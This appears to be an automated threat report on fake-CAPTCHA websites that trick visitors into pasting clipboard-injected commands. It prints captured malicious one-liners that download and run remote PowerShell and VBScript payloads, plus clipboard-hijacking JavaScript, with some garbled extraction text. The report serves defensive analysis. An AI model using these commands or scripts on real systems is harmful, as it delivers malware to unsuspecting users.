ClickGrab Threat Analysis Report - 2025-12-29
Generated on 2025-12-29 03:02:21
Executive Summary
- Total sites analyzed: 41
- Sites with malicious content: 19
- Unique domains encountered: 31
- Total URLs extracted: 168
- PowerShell download attempts: 1
- Clipboard manipulation instances: 112
Domain Analysis
Most Frequently Encountered Domains
- www.google.com: 21 occurrences
- t.me: 19 occurrences
- i.postimg.cc: 18 occurrences
- icons.duckduckgo.com: 18 occurrences
- ${host}: 18 occurrences
- www.webgo.de: 10 occurrences
- inkbookwriters.com: 10 occurrences
- godprox.cc: 8 occurrences
- svetvip.ru: 8 occurrences
- api.whatsapp.com: 6 occurrences
- mc.yandex.ru: 4 occurrences
- www.thawte.com: 2 occurrences
- www.digicert.com: 2 occurrences
- vk.com: 2 occurrences
- www.facebook.com: 2 occurrences
URL Pattern Analysis
reCAPTCHA imagery
1 occurrences across 1 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(1 times)
Font resources
1 occurrences across 1 distinct URLs
https://use.fontawesome.com/releases/v5.0.0/css/all.css(1 times)
CDN hosted scripts
1 occurrences across 1 distinct URLs
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1(1 times)
Google resources
21 occurrences across 4 distinct URLs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(18 times)https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(1 times)https://www.google.com/intl/en/policies/privacy/(1 times)https://www.google.com/intl/en/policies/terms/(1 times)
Suspicious Keyword Analysis
Total Keywords Found: 352 (38 unique)
Keyword Categories
Social Engineering
14 unique keywords
CAPTCHA VerificationrobotVerificationI am not a robotChecking if you are humanVerification HashTo better prove you are not a robotVerification IDVerify you are humanverification-id- ...and 4 more
Obfuscation Indicators
1 unique keywords
Command iine: [2]RemoveFiiesRemoving fiiesRemoveIniVaiuesRemoving INI fiies entriesRemoveODBCRemoving ODBC componentsSeifRegModuiesRegistering moduiesFiie: [i], Foider: [2]RemoveShortcutsRemoving shortcutsSeifUnregModuiesUnregistering moWY[�\�_b�ceg��di�jimo�hpquruvwy{|}~������������������#�����-�&��)�������K ����.���aZ���^������z�����[�����A�������������� `
System Commands
12 unique keywords
cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;";`invokecommand =cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\Downioads\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;";cmdexec(exec /i http://inkbookwriters.com/verify /qn';wscriptconst command =command = 'cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)- ...and 2 more
Verification Text
3 unique keywords
Hiddenhiddenray id
Technical Terms
8 unique keywords
.EXE.exeBypassfailed_to_retrievebitmapiexBitmapRay ID
Most Frequent Keywords
- robot: 21 occurrences
- hidden: 21 occurrences
- CAPTCHA Verification: 19 occurrences
- I am not a robot: 19 occurrences
- Robot: 19 occurrences
- Verification: 19 occurrences
- verification: 19 occurrences
- verification-id: 19 occurrences
- To better prove you are not a robot: 19 occurrences
- Verification ID: 18 occurrences
- Ray ID: 18 occurrences
- Checking if you are human: 18 occurrences
- Verify you are human: 18 occurrences
- const command =: 18 occurrences
- failed_to_retrieve: 11 occurrences
Similar Keyword Patterns
Groups of keywords that appear to be variations of the same theme:
Group 1: .EXE, .exe
Group 2: Bitmap, bitmap
Group 3: CAPTCHA Verification, Verification, verification
Group 4: Verification Hash, verification-id, verification_id, Verification ID, verification id
Group 5: Robot, robot
JavaScript Obfuscation Analysis
Obfuscation Sophistication Score: 0/7
Potential Base64 Encoded Content
These strings may contain encoded malicious payloads:
01208b00f4c6185466ba26bf50646f4eshortcutsSeifUnregModuiesUnregisteringcom/recaptcha/about/images/reCAPTCHA0ac7fbabd382401f3c8c851a9de2d6c1fiiesRemoveIniVaiuesRemoving
Clipboard Manipulation Analysis
Detected clipboard manipulation in 112 instances.
Document.Execcommand Copy
Found in 57 snippets (50.9% of clipboard code)
Examples:
document.execCommand("copy")
try { document.execCommand('copy')
Textarea Manipulation
Found in 57 snippets (50.9% of clipboard code)
Examples:
ng is the safe placeholder above const textarea = document.createElement('textarea'
tListener("click", function () { const textarea = document.createElement('textarea'
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
Complete Malicious Functions
Function 1:
function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
Report truncated for web display. Full data available in JSON.